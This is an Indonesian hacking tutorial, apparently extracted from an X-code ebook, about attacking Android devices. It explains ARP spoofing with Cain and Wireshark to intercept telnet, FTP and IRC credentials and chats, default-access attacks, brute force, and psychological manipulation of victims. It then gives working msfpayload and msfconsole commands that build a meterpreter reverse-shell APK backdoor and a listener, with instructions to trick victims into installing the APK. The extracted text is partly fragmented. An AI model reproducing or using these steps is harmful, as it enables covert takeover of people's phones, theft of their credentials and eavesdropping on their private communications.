Ebookxcode PDF
Ebookxcode PDF
NMAP
Cain
Hydra
Wireshark
Selain tool diatas juga kamu bisa menambah dengan Kali Linux dan Virtual Box.
Tahapan scanning
Setelah kamu mendapatkan ip address target maka kamu bisa memilih ingin menyerang
dengan teknik seperti apa.
Untuk penyadapan bisa menggunakan teknik ARP Spoofing
Untuk serangan instant bisa mencoba mengakses service korban dengan
memanfaatkan akses default
Untuk serangan menebak password secara brutal dan otomatis maka gunakan
teknik Brute Force
ARP (Address Resolution Protocol ) Spoofing adalah sebuah teknik penyadapan oleh
pihak ketiga yang dilakukan dalam sebuah jaringan LAN.
Penyadapan
Langkah awal terlebih dahulu periksa port dan service android target dengan NMAP.
Untuk disini ARP Spoofing menggunakan Cain. Disini kamu bisa belajar menggunakan
Cain, dalam pencarian di google.com, kamu bisa mendapatkan tutorialnya, disini di
asumsikan kamu sudah bisa menggunakan program cain.
Untuk penyadapan pada protokol yang tidak aman yang kamu temukan di target android
maka umumnya kamu harus memasukkan port target di bagian Filter dan Ports, pilihan
menunya ada di Configuration.
Lakukan scanning seperti biasa, disini kamu bisa melihat pada kolom OUI fingerprint
muncul tulisan Lenovo Movile Communication.
Setelah dilakukan spoofing, saat dibawah ini pemilik android ingin mengakses telnet
pada android maka passwordnya juga akan dikirim ke komputer penyerang.
Hasil penyadapan telnet ada di bawah ini
Penyadapan pada FTP
Pengguna chatting IRC di android bisa di sadap di jaringan LAN dengan gabungan
program Cain dan wireshark
Latar belakang
Banyak pengguna IRC di channel-channel kota yang dimana saat mereka online
memanfaatkan jaringan hotspot maka memungkinkan isi chatting dapat disadap.
Lakukan terlebih dahulu ARP Spoofing dengan Cain, disini tidak diberitahukan step by
step, karena caranya sudah ada di materi sebelumnya. Disini ditunjukkan langsung pada
New ARP Poison Routing.
Saat paket sudah masuk, klik kanan pada TCP yang berhubungan dengan IRC
Serangan memanfaatkan akses default ini untuk target yang menjalankan service namun
masih menggunakan konfigurasi default.
Brute force attack adalah sebuah teknik serangan terhadap sebuah sistem keamanan
komputer yang menggunakan percobaan terhadap semua kunci yang mungkin.
\
Hacking android dengan social engineering
Social engineering adalah manipulasi psikologis dari seseorang dalam melakukan aksi
atau menguak suatu informasi rahasia
Dengan social engineering maka kita bisa menuntun target melakukan apa yang kita mau,
disini target dibuat yakin bahwa dirinya itu yang memegang kontrol atas situasi tersebut.
Intinya disini target dibuat untuk merasa bahwa dia telah membuat keputusan yang tepat
Disini kita membuat backdoor. Dengan backdoor ini saat korban menjalankan aplikasi
dengan format APK ini di ponsel atau tablet android miliknya maka ponsel atau tablet
androidnya akan teremote oleh penyerang.
Praktek
Jalankan Kali Linux, di terminal masukkan seperti dibawah ini, jangan lupa IP address di
ganti
msfpayload android/meterpreter/reverse_tcp
LHOST=192.168.1.100 LPORT=4444 R > app.apk
Hasilnya adalah kamu akan mendapatkan file app.apk, file ini di jalankan di komputer
target, caranya kamu dapat memanfaatkan social engineering.
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100 (ip address kamu)
set lport 4444
exploit
Jika targetnya adalah di internet maka set ip address dengan ip address publik, jika
targetnya di jaringan lokal maka set ip address dengan ip address lokal.
X-code Training
Jika ingin belajar lebih seperti Network hacking, web hacking, wireless hacking dan
sebagainya maka klik http://xcode.or.id/training